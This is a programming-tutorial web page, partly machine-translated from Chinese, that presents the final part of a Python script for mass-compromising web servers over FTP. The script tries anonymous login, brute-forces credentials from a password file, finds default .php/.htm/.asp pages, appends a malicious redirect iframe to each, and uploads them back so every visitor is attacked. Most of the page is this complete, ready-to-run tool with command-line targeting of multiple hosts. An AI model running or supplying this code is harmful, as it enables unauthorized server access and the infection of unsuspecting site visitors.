程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

[Advanced Python scripting] 2.3. Use FTP and Web to capture meat machine in batches (final)

編輯:Python

目錄

一、最後一步:

分析:

二、完整

分析:


一、最後一步:

分析:

The final step of the entire attack:attack()函數

1、attack()The input parameter of the function includes a username、密碼、hostname and redirect location.The function first uses the username/密碼登錄FTP 服務器.

2、 This script will search the default web page,and download each page found, and add malicious redirection code to it.

3、 The script will return the web page that was hung upFTP 服務器, 任何訪問該Web Server machines will be hacked

def attack(username, password, tgtHost, redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)



二、完整

分析:

Parse code by adding some command line arguments, To complete the entire script


首先看FTP Can the server be accessed anonymously?.不能, brute force password,Can crack passwords orFTP Can log in anonymously, 登錄到FTP attack on the site.despite only a few hundred lines of code, but it completely replicatesk985ytv Attack vector used in the attack.

import ftplib
import optparse
import time
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous', 'password')
print('\n(*) ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
ftp.quit()
return True
except Exception as e:
print('[*]' + str(e))
print('\n[-]' + str(hostname) + 'FTP Anonymous Logon Failed.')
return False
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
time.sleep(1)
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print('[+] Trying: ' + userName + '/' + passWord)
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + userName + '/' + passWord)
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials')
return (None, None)
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print('[-] Could not list directory contents.')
print('[-] Skipping To Next Target.')
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print('[+] Found default page: ' + fileName)
retList.append(fileName)
return retList
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
ftp.retrlines('RETR ' + page, f.write)
print('[+] Downloaded Page: ' + page)
f.write(redirect)
f.close()
print('[+] Injected Malicious IFrame on: ' + page)
ftp.storlines('STOR ' + page, open(page + '.tmp'))
print('[+] Uploaded Injected Page: ' + page)
def attack(username, password, tgtHost, redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)
def main():
parser = optparse.OptionParser('usage%prog ' + '-H <target host[s]> -r <redirect page>' + '[ -f <userpass file>]')
parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host')
parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file')
parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page')
(options, args) = parser.parse_args()
tgtHosts = str(options.tgtHosts).split(', ')
passwdFile = options.passwdFile
redirect = options.redirect
if tgtHosts == None or redirect == None:
print(parser.usage)
exit(0)
for tgtHost in tgtHosts:
username = None
password = None
if anonLogin(tgtHost) == True:
username = 'anonymous'
password = ''
print('[+] Using Anonymous Creds to attack')
attack(username, password, tgtHost, redirect)
elif passwdFile != None:
(username, password) = \
bruteLogin(tgtHost, passwdFile)
if password != None:
print('[+] Using Creds: ' + username + '/' + password + ' to attack')
attack(username, password, tgtHost, redirect)
if __name__ == '__main__':
main()

  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved